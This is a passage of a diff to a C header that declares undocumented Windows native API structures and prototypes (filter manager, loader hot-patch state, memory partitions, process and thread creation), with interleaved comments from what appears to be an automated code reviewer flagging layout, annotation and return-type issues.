+ /* 0x0100 */ PVOID FilterUnload /* function */;
+ /* 0x0108 */ PVOID InstanceSetup /* function */;
+ /* 0x0110 */ PVOID InstanceQueryTeardown /* function */;
+ /* 0x0118 */ PVOID InstanceTeardownStart /* function */;
+ /* 0x0120 */ PVOID InstanceTeardownComplete /* function */;
+ /* 0x0128 */ struct _ALLOCATE_CONTEXT_HEADER* SupportedContextsListHead;
+ /* 0x0130 */ struct _ALLOCATE_CONTEXT_HEADER* SupportedContexts[7];
+ /* 0x0168 */ PVOID PreVolumeMount /* function */;
+ /* 0x0170 */ PVOID PostVolumeMount /* function */;
+ /* 0x0178 */ PVOID GenerateFileName /* function */;
+ /* 0x0180 */ PVOID NormalizeNameComponent /* function */;
+ /* 0x0188 */ PVOID NormalizeNameComponentEx /* function */;
+ /* 0x0190 */ PVOID NormalizeContextCleanup /* function */;
+ /* 0x0198 */ PVOID KtmNotification /* function */;
+ /* 0x01a0 */ PVOID SectionNotification /* function */;
+ /* 0x01a8 */ struct _FLT_OPERATION_REGISTRATION* Operations;
+ /* 0x01b0 */ PVOID OldDriverUnload /* function */;
+ /* 0x01b8 */ FLT_MUTEX_LIST_HEAD ActiveOpens;
+ /* 0x0208 */ FLT_MUTEX_LIST_HEAD ConnectionList;
+ /* 0x0258 */ FLT_MUTEX_LIST_HEAD PortList;
+ /* 0x02a8 */ EX_PUSH_LOCK_AUTO_EXPAND PortLock;
+} FLT_FILTER_V4, * PFLT_FILTER_V4; /* size: 0x02b8 */
+
+typedef FLT_FILTER_V4 FLT_FILTER_COMPATIBLE;
+typedef PFLT_FILTER_V4 PFLT_FILTER_COMPATIBLE;
/*
** FLT MANAGER END
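Review bot: `typedef FLT_FILTER_V4 FLT_FILTER_COMPATIBLE;` binds the version-neutral name to the newest layout, which is not a common prefix of the others: V1 and V2 start with the 0x20-byte `FLT_OBJECT` while V3 and V4 start with the 0x30-byte `FLT_OBJECT_V2`, so every member after `Base` sits at a different offset. Code that interprets a filter object through the alias on a Windows 7 or 8.x layout would read the wrong fields, so I would put a comment on the alias such as `// Newest layout only; select FLT_FILTER_V1..V4 by build number before dereferencing.` Separately, `FLT_FILTER_V1` declares `struct FLT_VERIFIER_EXTENSION*` without the leading underscore used in V2 to V4, and the `/* size: ... */` comments here are not enforced the way the `C_ASSERT` block added for `KUSER_SHARED_DATA` is.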
@@ -5957,6 +6928,7 @@ typedef struct _SILO_USER_SHARED_DATA {
ULONG SuiteMask;
ULONG SharedUserSessionId;
BOOLEAN IsMultiSessionSku;
+ BOOLEAN IsStateSeparationEnabled;
WCHAR NtSystemRoot[260];
USHORT UserModeGlobalLogger[16];
} SILO_USER_SHARED_DATA, *PSILO_USER_SHARED_DATA;
@@ -5973,6 +6945,13 @@ typedef struct _OBP_SILODRIVERSTATE {
OBJECT_NAMESPACE_LOOKUPTABLE PrivateNamespaceLookupTable;
} OBP_SILODRIVERSTATE, *POBP_SILODRIVERSTATE;
+typedef struct _OBP_SILODRIVERSTATE_V2 {
+ EX_FAST_REF SystemDeviceMap;
+ OBP_SYSTEM_DOS_DEVICE_STATE SystemDosDeviceState;
+ EX_PUSH_LOCK DeviceMapLock;
+ OBJECT_NAMESPACE_LOOKUPTABLE PrivateNamespaceLookupTable;
+} OBP_SILODRIVERSTATE_V2, * POBP_SILODRIVERSTATE_V2; /* size: 0x02e0 */
+
//incomplete, values not important, change between versions.
typedef struct _ESERVERSILO_GLOBALS {
OBP_SILODRIVERSTATE ObSiloState;
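Review bot: `OBP_SILODRIVERSTATE_V2` is added with a size comment but no indication of the build it applies to or how it differs from `OBP_SILODRIVERSTATE`, whose full definition starts outside this hunk. `ESERVERSILO_GLOBALS` directly below still embeds the original type as `ObSiloState`, so on a build that uses the V2 layout every member after it would presumably be at a different offset than declared. I would add a comment on the new struct along the lines of `// Since <build, to be confirmed>; ESERVERSILO_GLOBALS below still describes the V1 layout.`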
@@ -6316,7 +7295,7 @@ PushEntryList(
#define LDR_DLL_NOTIFICATION_REASON_UNLOADED 2
typedef enum _LDR_DLL_LOAD_REASON {
- LoadReasonStaticDependency,
+ LoadReasonStaticDependency = 0,
LoadReasonStaticForwarderDependency,
LoadReasonDynamicForwarderDependency,
LoadReasonDelayloadDependency,
@@ -6325,6 +7304,7 @@ typedef enum _LDR_DLL_LOAD_REASON {
LoadReasonAsDataLoad,
LoadReasonEnclavePrimary,
LoadReasonEnclaveDependency,
+ LoadReasonPatchImage,
LoadReasonUnknown = -1
} LDR_DLL_LOAD_REASON, * PLDR_DLL_LOAD_REASON;
@@ -6429,36 +7409,17 @@ typedef struct _LDR_DATA_TABLE_ENTRY_COMPATIBLE {
PVOID SectionPointer;
ULONG CheckSum;
};
- } DUMMYUNION1;
- union
- {
- ULONG TimeDateStamp;
- PVOID LoadedImports;
- } DUMMYUNION2;
- //fields below removed for compatibility, if you need them use LDR_DATA_TABLE_ENTRY_FULL
-} LDR_DATA_TABLE_ENTRY_COMPATIBLE, * PLDR_DATA_TABLE_ENTRY_COMPATIBLE;
-typedef LDR_DATA_TABLE_ENTRY_COMPATIBLE LDR_DATA_TABLE_ENTRY;
-typedef LDR_DATA_TABLE_ENTRY_COMPATIBLE* PLDR_DATA_TABLE_ENTRY;
-typedef LDR_DATA_TABLE_ENTRY* PCLDR_DATA_TABLE_ENTRY;
-
-typedef struct _RTL_BALANCED_NODE
-{
- union
- {
- struct _RTL_BALANCED_NODE* Children[2];
- struct
- {
- struct _RTL_BALANCED_NODE* Left;
- struct _RTL_BALANCED_NODE* Right;
- };
- };
+ } DUMMYUNION1;
union
{
- UCHAR Red : 1;
- UCHAR Balance : 2;
- ULONG_PTR ParentValue;
- };
-} RTL_BALANCED_NODE, * PRTL_BALANCED_NODE;
+ ULONG TimeDateStamp;
+ PVOID LoadedImports;
+ } DUMMYUNION2;
+ //fields below removed for compatibility, if you need them use LDR_DATA_TABLE_ENTRY_FULL
+} LDR_DATA_TABLE_ENTRY_COMPATIBLE, * PLDR_DATA_TABLE_ENTRY_COMPATIBLE;
+typedef LDR_DATA_TABLE_ENTRY_COMPATIBLE LDR_DATA_TABLE_ENTRY;
+typedef LDR_DATA_TABLE_ENTRY_COMPATIBLE* PLDR_DATA_TABLE_ENTRY;
+typedef LDR_DATA_TABLE_ENTRY* PCLDR_DATA_TABLE_ENTRY;
typedef BOOLEAN(NTAPI* PLDR_INIT_ROUTINE)(
_In_ PVOID DllHandle,
@@ -6514,6 +7475,16 @@ typedef struct _LDR_DDAG_NODE
ULONG PreorderNumber;
} LDR_DDAG_NODE, * PLDR_DDAG_NODE;
+typedef enum _LDR_HOT_PATCH_STATE
+{
+ LdrHotPatchBaseImage = 0,
+ LdrHotPatchNotApplied = 1,
+ LdrHotPatchAppliedReverse = 2,
+ LdrHotPatchAppliedForward = 3,
+ LdrHotPatchFailedToPatch = 4,
+ LdrHotPatchStateMax = 5,
+} LDR_HOT_PATCH_STATE, * PLDR_HOT_PATCH_STATE;
+
//
// Full declaration of LDR_DATA_TABLE_ENTRY
//
@@ -6588,6 +7559,12 @@ typedef struct _LDR_DATA_TABLE_ENTRY_FULL
ULONG ReferenceCount;
ULONG DependentLoadFlags;
UCHAR SigningLevel;
+ CHAR Padding1[3];
+ ULONG CheckSum;
+ LONG Padding2;
+ PVOID ActivePatchImageBase;
+ LDR_HOT_PATCH_STATE HotPatchState;
+ LONG __PADDING__[1];
} LDR_DATA_TABLE_ENTRY_FULL, * PLDR_DATA_TABLE_ENTRY_FULL;
typedef struct _LDR_DLL_LOADED_NOTIFICATION_DATA {
@@ -6919,7 +7896,7 @@ NTSTATUS
NTAPI
LdrRelocateImage(
_In_ PVOID NewBase,
- _In_ PSTR LoaderName,
+ _In_opt_ PSTR LoaderName,
_In_ NTSTATUS Success,
_In_ NTSTATUS Conflict,
_In_ NTSTATUS Invalid);
@@ -6933,14 +7910,16 @@ LdrProcessRelocationBlock(
_In_ PUSHORT NextOffset,
_In_ LONG_PTR Diff);
+DECLSPEC_NORETURN
NTSYSAPI
-NTSTATUS
+VOID
NTAPI
LdrShutdownProcess(
VOID);
+DECLSPEC_NORETURN
NTSYSAPI
-NTSTATUS
+VOID
NTAPI
LdrShutdownThread(
VOID);
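Review bot: `DECLSPEC_NORETURN` on `LdrShutdownProcess` and `LdrShutdownThread` looks wrong: as far as I know both ntdll routines return to their caller, which then issues the actual terminate call. With the attribute the compiler may treat everything after the call as unreachable and drop it, so a caller that relies on a following terminate call could run off the end of its function. Unless there is evidence that these exports never return, I would drop the attribute from both declarations; whether `VOID` or `NTSTATUS` is the right return type cannot be settled from this hunk.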
@@ -7070,7 +8049,7 @@ NTSTATUS
NTAPI
RtlInitUnicodeStringEx(
_Out_ PUNICODE_STRING DestinationString,
- _In_opt_ PWSTR SourceString);
+ _In_opt_ PCWSTR SourceString);
NTSYSAPI
BOOLEAN
@@ -7275,7 +8254,7 @@ RtlGetFullPathName_U(
_Out_opt_ PWSTR *lpFilePart);
NTSYSAPI
-BOOLEAN
+NTSTATUS
NTAPI
RtlGetSearchPath(
_Out_ PWSTR *SearchPath);
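Review bot: Changing the declared return type of `RtlGetSearchPath` from `BOOLEAN` to `NTSTATUS` inverts any truthiness check on the result, because `STATUS_SUCCESS` is 0: a caller written as `if (RtlGetSearchPath(&path))` would now take the branch on failure. No call sites are visible in this hunk, so each one needs checking and should test `NT_SUCCESS(status)` instead. The hunk also gives no source for the new return type, so a short comment naming the ntdll build it was verified against would help.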
@@ -7396,14 +8375,14 @@ VOID
NTAPI
RtlRunEncodeUnicodeString(
_Inout_ PUCHAR Seed,
- _In_ PUNICODE_STRING String);
+ _Inout_ PUNICODE_STRING String);
NTSYSAPI
VOID
NTAPI
RtlRunDecodeUnicodeString(
_In_ UCHAR Seed,
- _In_ PUNICODE_STRING String);
+ _Inout_ PUNICODE_STRING String);
/************************************************************************************
*
@@ -8863,6 +9842,26 @@ NTAPI
RtlGetSystemTimePrecise(
VOID);
+NTSYSAPI
+LARGE_INTEGER
+NTAPI
+RtlGetInterruptTimePrecise(
+ _Out_ PLARGE_INTEGER PerformanceCounter);
+
+NTSYSAPI
+BOOLEAN
+NTAPI
+RtlQueryUnbiasedInterruptTime(
+ _Out_ PLARGE_INTEGER InterruptTime);
+
+NTSYSAPI
+KSYSTEM_TIME
+NTAPI
+RtlGetSystemTimeAndBias(
+ _Out_ KSYSTEM_TIME TimeZoneBias,
+ _Out_opt_ PLARGE_INTEGER TimeZoneBiasEffectiveStart,
+ _Out_opt_ PLARGE_INTEGER TimeZoneBiasEffectiveEnd);
+
/************************************************************************************
*
* RTL Debug Support API.
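Review bot: In `RtlGetSystemTimeAndBias` the first parameter is declared as `_Out_ KSYSTEM_TIME TimeZoneBias`, an output annotation on a by-value structure, which is contradictory because a callee cannot hand data back through a copy. If the routine fills the caller's structure, the declaration should take a pointer, `_Out_ KSYSTEM_TIME* TimeZoneBias`. A by-value declaration can appear to work on x64 only because a 12-byte aggregate is passed by hidden reference. The real signature is not established by anything in this hunk, so it should be confirmed against the export before the prototype is used.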
@@ -9332,6 +10331,28 @@ RtlAddIntegrityLabelToBoundaryDescriptor(
_Inout_ PVOID *BoundaryDescriptor,
_In_ PSID IntegrityLabel);
+/************************************************************************************
+*
+* RTL work item/async IO.
+*
+************************************************************************************/
+
+NTSYSAPI
+NTSTATUS
+NTAPI
+RtlQueueWorkItem(
+ _In_ WORKERCALLBACKFUNC Function,
+ _In_ PVOID Context,
+ _In_ ULONG Flags);
+
+NTSYSAPI
+NTSTATUS
+NTAPI
+RtlSetIoCompletionCallback(
+ _In_ HANDLE FileHandle,
+ _In_ APC_CALLBACK_FUNCTION CompletionProc,
+ _In_ ULONG Flags);
+
/************************************************************************************
*
* RTL data exports.
@@ -9356,15 +10377,13 @@ NTSYSAPI UNICODE_STRING RtlNtPathSeperatorString;
*
************************************************************************************/
-struct _EVENT_FILTER_DESCRIPTOR;
-
-typedef VOID(NTAPI *PENABLECALLBACK)(
+typedef VOID(NTAPI *PETWENABLECALLBACK)(
_In_ LPCGUID SourceId,
_In_ ULONG IsEnabled,
_In_ UCHAR Level,
_In_ ULONGLONG MatchAnyKeyword,
_In_ ULONGLONG MatchAllKeyword,
- _In_opt_ struct _EVENT_FILTER_DESCRIPTOR *FilterData,
+ _In_opt_ /*EVENT_FILTER_DESCRIPTOR*/ PVOID FilterData,
_Inout_opt_ PVOID CallbackContext
);
@@ -9373,10 +10392,20 @@ NTSTATUS
NTAPI
EtwEventRegister(
_In_ LPCGUID ProviderId,
- _In_opt_ PENABLECALLBACK EnableCallback,
+ _In_opt_ PETWENABLECALLBACK EnableCallback,
_In_opt_ PVOID CallbackContext,
_Out_ PREGHANDLE RegHandle);
+NTSYSAPI
+ULONG
+NTAPI
+EtwEventWriteNoRegistration(
+ _In_ LPCGUID ProviderId,
+ _In_ /*PCEVENT_DESCRIPTOR*/ PVOID EventDescriptor,
+ _In_ ULONG UserDataCount,
+ _In_reads_opt_(UserDataCount) /*PEVENT_DATA_DESCRIPTOR*/PVOID UserData);
+
+
/*
** Runtime Library API END
*/
@@ -10058,6 +11087,12 @@ NtDeletePrivateNamespace(
*
************************************************************************************/
+typedef enum _SYMBOLIC_LINK_INFO_CLASS {
+ SymbolicLinkGlobalInformation = 1,
+ SymbolicLinkAccessMask,
+ MaxnSymbolicLinkInfoClass
+} SYMBOLIC_LINK_INFO_CLASS;
+
typedef struct _OBJECT_SYMBOLIC_LINK_V1 { //pre Win10 TH1
LARGE_INTEGER CreationTime;
UNICODE_STRING LinkTarget;
@@ -10134,6 +11169,14 @@ NtQuerySymbolicLinkObject(
_Inout_ PUNICODE_STRING LinkTarget,
_Out_opt_ PULONG ReturnedLength);
+NTSTATUS
+NTAPI
+NtSetInformationSymbolicLink(
+ _In_ HANDLE LinkHandle,
+ _In_ SYMBOLIC_LINK_INFO_CLASS SymbolicLinkInformationClass,
+ _In_reads_bytes_(SymbolicLinkInformationLength) PVOID SymbolicLinkInformation,
+ _In_ ULONG SymbolicLinkInformationLength);
+
/************************************************************************************
*
* File API (+Driver&HotPatch).
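Review bot: `NtSetInformationSymbolicLink` is declared without `NTSYSAPI`, unlike the other prototypes this commit adds (for example `NtManageHotPatch` and `NtCreatePartition`), so it is the one import not marked as such. Adding `NTSYSAPI` as the first line of the declaration keeps it consistent with the rest of the header. The enum it takes, added in the previous hunk, ends in `MaxnSymbolicLinkInfoClass`, which reads like a typo for `MaxSymbolicLinkInfoClass`; if the spelling is deliberate, a comment saying so would prevent a well-meant rename.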
@@ -10338,7 +11381,7 @@ NtQueryDirectoryFile(
_In_opt_ PUNICODE_STRING FileName,
_In_ BOOLEAN RestartScan);
-NTSYSCALLAPI
+NTSYSAPI
NTSTATUS
NTAPI
NtQueryDirectoryFileEx(
@@ -10347,7 +11390,7 @@ NtQueryDirectoryFileEx(
_In_opt_ PIO_APC_ROUTINE ApcRoutine,
_In_opt_ PVOID ApcContext,
_Out_ PIO_STATUS_BLOCK IoStatusBlock,
- _Out_ PVOID FileInformation,
+ _Out_writes_bytes_(Length) PVOID FileInformation,
_In_ ULONG Length,
_In_ FILE_INFORMATION_CLASS FileInformationClass,
_In_ ULONG QueryFlags,
@@ -10486,6 +11529,15 @@ NtLoadHotPatch(
_In_ PUNICODE_STRING HotPatchName,
_Reserved_ ULONG LoadFlag);
+NTSYSAPI
+NTSTATUS
+NTAPI
+NtManageHotPatch(
+ _In_ ULONG HotPatchInformation,
+ _In_ PVOID HotPatchData,
+ _In_ ULONG Length,
+ _Out_ PULONG ReturnLength);
+
/************************************************************************************
*
* Section API (+MemoryPartitions).
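Review bot: `NtManageHotPatch` declares `_In_ PVOID HotPatchData` and `_In_ ULONG Length` without tying the buffer to its length, whereas this same commit upgrades `NtQueryDirectoryFileEx` to `_Out_writes_bytes_(Length)` and `NtManagePartition` to `_Inout_updates_bytes_(PartitionInformationLength)`. Static analysis therefore cannot check the buffer size at call sites of the new prototype. I would write `_In_reads_bytes_(Length) PVOID HotPatchData`, or `_Inout_updates_bytes_(Length)` if the call also writes into it, which the `_Out_ PULONG ReturnLength` parameter suggests but does not prove. `HotPatchInformation` is a bare `ULONG` information class, so a comment listing the accepted values would also help.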
@@ -10507,6 +11559,13 @@ typedef enum _MEMORY_PARTITION_INFORMATION_CLASS {
SystemMemoryPartitionCombineMemory,
SystemMemoryPartitionInitialAddMemory,
SystemMemoryPartitionGetMemoryEvents,
+ SystemMemoryPartitionSetAttributes,
+ SystemMemoryPartitionNodeInformation,
+ SystemMemoryPartitionCreateLargePages,
+ SystemMemoryPartitionDedicatedMemoryInformation,
+ SystemMemoryPartitionOpenDedicatedMemory,
+ SystemMemoryPartitionMemoryChargeAttributes,
+ SystemMemoryPartitionClearAttributes,
SystemMemoryPartitionMax
} MEMORY_PARTITION_INFORMATION_CLASS;
@@ -10555,7 +11614,14 @@ typedef struct _MEMORY_PARTITION_CONFIGURATION_INFORMATION {
ULONG_PTR ZeroPages;
ULONG_PTR FreePages;
ULONG_PTR StandbyPages;
-} MEMORY_PARTITION_CONFIGURATION_INFORMATION, *PMEMORY_PARTITION_CONFIGURATION_INFORMATION;
+
+ // Fields added RS1+
+ ULONG_PTR StandbyPageCountByPriority[8];
+ ULONG_PTR RepurposedPagesByPriority[8];
+ ULONG_PTR MaximumCommitLimit;
+ ULONG_PTR DonatedPagesToPartitions;
+ ULONG PartitionId;
+} MEMORY_PARTITION_CONFIGURATION_INFORMATION, * PMEMORY_PARTITION_CONFIGURATION_INFORMATION;
NTSYSAPI
NTSTATUS
@@ -10693,6 +11759,42 @@ NtAreMappedFilesTheSame(
_In_ PVOID File1MappedAsAnImage,
_In_ PVOID File2MappedAsFile);
+//
+// NtCreatePartition
+//
+
+//
+// 10248
+//
+typedef NTSTATUS(NTAPI* pfnNtCreatePartitionV1)(
+ _Out_ PHANDLE PartitionHandle,
+ _In_ ACCESS_MASK DesiredAccess,
+ _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
+ _In_ ULONG PreferredNode);
+
+//
+// 10586
+//
+typedef NTSTATUS(NTAPI* pfnNtCreatePartitionV2)(
+ _In_ HANDLE ParentPartitionHandle,
+ _Out_ HANDLE* PartitionHandle,
+ _In_ ULONG DesiredAccess,
+ _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
+ _In_ ULONG Node);
+
+//
+// Actual NtCreatePartition definition since Win10 10586
+//
+NTSYSAPI
+NTSTATUS
+NTAPI
+NtCreatePartition(
+ _In_ HANDLE ParentPartitionHandle,
+ _Out_ HANDLE* PartitionHandle,
+ _In_ ULONG DesiredAccess,
+ _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
+ _In_ ULONG Node);
+
NTSYSAPI
NTSTATUS
NTAPI
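Review bot: The comments `// 10248` and `// 10586` above the two typedefs are bare numbers with nothing saying they are Windows 10 build numbers. 10248 also does not match the RTM build (10240) as far as I know, so please confirm it. I would spell them out, e.g. `// Windows 10 build 10248 (confirm; RTM is 10240): four-argument form` and `// Windows 10 build 10586 and later: ParentPartitionHandle added`. The NTSYSAPI prototype now has only the five-argument shape, so the comment should state that code running on the older build must call through `pfnNtCreatePartitionV1` rather than the imported symbol. The new declaration also uses `_In_ ULONG DesiredAccess` and `HANDLE*` where V1 uses `ACCESS_MASK` and `PHANDLE`, and keeping one spelling would read more consistently.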
@@ -10708,18 +11810,9 @@ NtManagePartition(
_In_ HANDLE TargetHandle,
_In_opt_ HANDLE SourceHandle,
_In_ MEMORY_PARTITION_INFORMATION_CLASS PartitionInformationClass,
- _In_ PVOID PartitionInformation,
+ _Inout_updates_bytes_(PartitionInformationLength) PVOID PartitionInformation,
_In_ ULONG PartitionInformationLength);
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtCreatePartition(
- _Out_ PHANDLE PartitionHandle,
- _In_ ACCESS_MASK DesiredAccess,
- _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
- _In_ ULONG PreferredNode);
-
/************************************************************************************
*
* Token API.
@@ -10913,10 +12006,21 @@ NtDuplicateToken(
_In_ TOKEN_TYPE TokenType,
_Out_ PHANDLE NewTokenHandle);
+#ifndef DISABLE_MAX_PRIVILEGE
#define DISABLE_MAX_PRIVILEGE 0x1 // winnt
+#endif
+
+#ifndef SANDBOX_INERT
#define SANDBOX_INERT 0x2 // winnt
-#define LUA_TOKEN 0x4
-#define WRITE_RESTRICT 0x8
+#endif
+
+#ifndef LUA_TOKEN
+#define LUA_TOKEN 0x4 // winnt
+#endif
+
+#ifndef WRITE_RESTRICTED
+#define WRITE_RESTRICTED 0x8 // winnt
+#endif
NTSYSAPI
NTSTATUS
@@ -11714,9 +12818,83 @@ NtOpenTransactionManager(
*
************************************************************************************/
+typedef struct _INITIAL_TEB
+{
+ struct
+ {
+ PVOID OldStackBase;
+ PVOID OldStackLimit;
+ } OldInitialTeb;
+ PVOID StackBase;
+ PVOID StackLimit;
+ PVOID StackAllocationBase;
+} INITIAL_TEB, * PINITIAL_TEB;
+
+#define PROCESS_GET_NEXT_FLAGS_PREVIOUS_PROCESS 0x00000001
+
#define QUEUE_USER_APC_FLAGS_NONE 0
#define QUEUE_USER_APC_FLAGS_SPECIAL_USER_APC 1
+//
+// NtCreateProcessEx specific flags.
+//
+#define PS_REQUEST_BREAKAWAY 1
+#define PS_NO_DEBUG_INHERIT 2
+#define PS_INHERIT_HANDLES 4
+#define PS_LARGE_PAGES 8
+#define PS_ALL_FLAGS (PS_REQUEST_BREAKAWAY | \
+ PS_NO_DEBUG_INHERIT | \
+ PS_INHERIT_HANDLES | \
+ PS_LARGE_PAGES)
+
+NTSYSAPI
+NTSTATUS
+NTAPI
+NtGetNextProcess(
+ _In_opt_ HANDLE ProcessHandle,
+ _In_ ACCESS_MASK DesiredAccess,
+ _In_ ULONG HandleAttributes,
+ _In_ ULONG Flags,
+ _Out_ PHANDLE NewProcessHandle);
+
+NTSYSAPI
+NTSTATUS
+NTAPI
+NtGetNextThread(
+ _In_ HANDLE ProcessHandle,
+ _In_ HANDLE ThreadHandle,
+ _In_ ACCESS_MASK DesiredAccess,
+ _In_ ULONG HandleAttributes,
+ _In_ ULONG Flags,
+ _Out_ PHANDLE NewThreadHandle);
+
+NTSYSAPI
+NTSTATUS
+NTAPI
+NtCreateProcess(
+ _Out_ PHANDLE ProcessHandle,
+ _In_ ACCESS_MASK DesiredAccess,
+ _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
+ _In_ HANDLE ParentProcess,
+ _In_ BOOLEAN InheritObjectTable,
+ _In_opt_ HANDLE SectionHandle,
+ _In_opt_ HANDLE DebugPort,
+ _In_opt_ HANDLE ExceptionPort);
+
+NTSYSAPI
+NTSTATUS
+NTAPI
+NtCreateProcessEx(
+ _Out_ PHANDLE ProcessHandle,
+ _In_ ACCESS_MASK DesiredAccess,
+ _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
+ _In_ HANDLE ParentProcess,
+ _In_ ULONG Flags,
+ _In_opt_ HANDLE SectionHandle,
+ _In_opt_ HANDLE DebugPort,
+ _In_opt_ HANDLE ExceptionPort,
+ _In_ BOOLEAN InJob);
+
NTSYSAPI
NTSTATUS
NTAPI
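Review bot: `ThreadHandle` in the added NtGetNextThread prototype is annotated `_In_`, while the sibling NtGetNextProcess in the same hunk marks its starting handle `_In_opt_`. Enumeration is normally started by passing NULL for the previous handle, so code analysis would flag that legitimate call. I would change the line to `_In_opt_ HANDLE ThreadHandle,`. The `Flags` parameters also carry no pointer to their legal values even though `PROCESS_GET_NEXT_FLAGS_PREVIOUS_PROCESS` is defined a few lines above. A trailing comment in the style used for NtCreateThreadEx, `_In_ ULONG Flags, // PROCESS_GET_NEXT_FLAGS_*`, would tie them together, and `NtCreateProcessEx`'s `Flags` could reference `PS_*` the same way.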
@@ -11733,6 +12911,35 @@ NtCreateUserProcess(
_Inout_ PPS_CREATE_INFO CreateInfo,
_In_opt_ PPS_ATTRIBUTE_LIST AttributeList);
+NTSYSAPI
+NTSTATUS
+NTAPI
+NtCreateThread(
+ _Out_ PHANDLE ThreadHandle,
+ _In_ ACCESS_MASK DesiredAccess,
+ _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
+ _In_ HANDLE ProcessHandle,
+ _Out_ PCLIENT_ID ClientId,
+ _In_ PCONTEXT ThreadContext,
+ _In_ PINITIAL_TEB InitialTeb,
+ _In_ BOOLEAN CreateSuspended);
+
+NTSYSAPI
+NTSTATUS
+NTAPI
+NtCreateThreadEx(
+ _Out_ PHANDLE ThreadHandle,
+ _In_ ACCESS_MASK DesiredAccess,
+ _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
+ _In_ HANDLE ProcessHandle,
+ _In_ PVOID StartRoutine,
+ _In_opt_ PVOID Argument,
+ _In_ ULONG CreateFlags, //THREAD_CREATE_FLAGS_*
+ _In_opt_ ULONG_PTR ZeroBits,
+ _In_opt_ SIZE_T StackSize,
+ _In_opt_ SIZE_T MaximumStackSize,
+ _In_opt_ PPS_ATTRIBUTE_LIST AttributeList);
+
NTSYSAPI
NTSTATUS
NTAPI
@@ -11761,6 +12968,27 @@ NTAPI
NtResumeProcess(
_In_ HANDLE ProcessHandle);
+NTSYSAPI
+NTSTATUS
+NTAPI
+NtCreateProcessStateChange(
+ _Out_ PHANDLE ProcessStateChangeHandle,
+ _In_ ACCESS_MASK DesiredAccess,
+ _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
+ _In_ HANDLE ProcessHandle,
+ _In_opt_ ULONG64 Reserved);
+
+NTSYSAPI
+NTSTATUS
+NTAPI
+NtChangeProcessState(
+ _In_ HANDLE ProcessStateChangeHandle,
+ _In_ HANDLE ProcessHandle,
+ _In_ PROCESS_STATE_CHANGE_TYPE StateChangeType,
+ _In_opt_ PVOID ExtendedInformation,
+ _In_opt_ SIZE_T ExtendedInformationLength,
+ _In_opt_ ULONG64 Reserved);
+
NTSYSAPI
NTSTATUS
NTAPI
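Review bot: NtCreateProcessStateChange and NtChangeProcessState are declared without any note on which Windows builds export them, unlike the NtCreatePartition block in this same diff, which records build numbers. As far as I know these calls arrived with Windows 11. Since NTSYSAPI prototypes are usually bound through the ntdll import library, a binary that references them statically may fail to load on older systems. I would add a comment such as `// Windows 11 and later (confirm build); resolve dynamically when older systems must be supported`. `ExtendedInformation` could also be tied to its size with `_In_reads_bytes_opt_(ExtendedInformationLength)`. The same two remarks apply to NtCreateThreadStateChange and NtChangeThreadState in the next hunk.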
@@ -11775,6 +13003,27 @@ NtResumeThread(
_In_ HANDLE ThreadHandle,
_Out_opt_ PULONG PreviousSuspendCount);
+NTSYSAPI
+NTSTATUS
+NTAPI
+NtCreateThreadStateChange(
+ _Out_ PHANDLE ThreadStateChangeHandle,
+ _In_ ACCESS_MASK DesiredAccess,
+ _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
+ _In_ HANDLE ThreadHandle,
+ _In_opt_ ULONG64 Reserved);
+
+NTSYSAPI
+NTSTATUS
+NTAPI
+NtChangeThreadState(
+ _In_ HANDLE ThreadStateChangeHandle,
+ _In_ HANDLE ThreadHandle,
+ _In_ THREAD_STATE_CHANGE_TYPE StateChangeType,
+ _In_opt_ PVOID ExtendedInformation,
+ _In_opt_ SIZE_T ExtendedInformationLength,
+ _In_opt_ ULONG64 Reserved);
+
NTSYSAPI
NTSTATUS
NTAPI
@@ -11904,39 +13153,35 @@ NtTestAlert(
NTSYSAPI
NTSTATUS
NTAPI
-NtDelayExecution(
- _In_ BOOLEAN Alertable,
- _In_opt_ PLARGE_INTEGER DelayInterval);
+NtAlertThread(
+ _In_ HANDLE ThreadHandle);
NTSYSAPI
NTSTATUS
NTAPI
-NtCreateProcessEx(
- _Out_ PHANDLE ProcessHandle,
- _In_ ACCESS_MASK DesiredAccess,
- _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
- _In_ HANDLE ParentProcess,
- _In_ ULONG Flags,
- _In_opt_ HANDLE SectionHandle,
- _In_opt_ HANDLE DebugPort,
- _In_opt_ HANDLE ExceptionPort,
- _In_ BOOLEAN InJob);
+NtAlertResumeThread(
+ _In_ HANDLE ThreadHandle,
+ _Out_opt_ PULONG PreviousSuspendCount);
NTSYSAPI
NTSTATUS
NTAPI
-NtCreateThreadEx(
- _Out_ PHANDLE ThreadHandle,
- _In_ ACCESS_MASK DesiredAccess,
- _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
- _In_ HANDLE ProcessHandle,
- _In_ PVOID StartRoutine,
- _In_opt_ PVOID Argument,
- _In_ ULONG CreateFlags, //THREAD_CREATE_FLAGS_*
- _In_opt_ ULONG_PTR ZeroBits,
- _In_opt_ SIZE_T StackSize,
- _In_opt_ SIZE_T MaximumStackSize,
- _In_opt_ PPS_ATTRIBUTE_LIST AttributeList);
+NtAlertThreadByThreadId(
+ _In_ HANDLE ThreadId);
+
+NTSYSAPI
+NTSTATUS
+NTAPI
+NtWaitForAlertByThreadId(
+ _In_ PVOID Address,
+ _In_opt_ PLARGE_INTEGER Timeout);
+
+NTSYSAPI
+NTSTATUS
+NTAPI
+NtDelayExecution(
+ _In_ BOOLEAN Alertable,
+ _In_opt_ PLARGE_INTEGER DelayInterval);
NTSYSAPI
ULONG
@@ -12068,6 +13313,14 @@ NtUnlockVirtualMemory(
_Inout_ PSIZE_T RegionSize,
_In_ ULONG MapType);
+NTSTATUS
+NTAPI
+NtFlushVirtualMemory(
+ _In_ HANDLE ProcessHandle,
+ _Inout_ PVOID* BaseAddress,
+ _Inout_ PSIZE_T RegionSize,
+ _Out_ struct _IO_STATUS_BLOCK* IoStatus);
+
NTSYSAPI
NTSTATUS
NTAPI
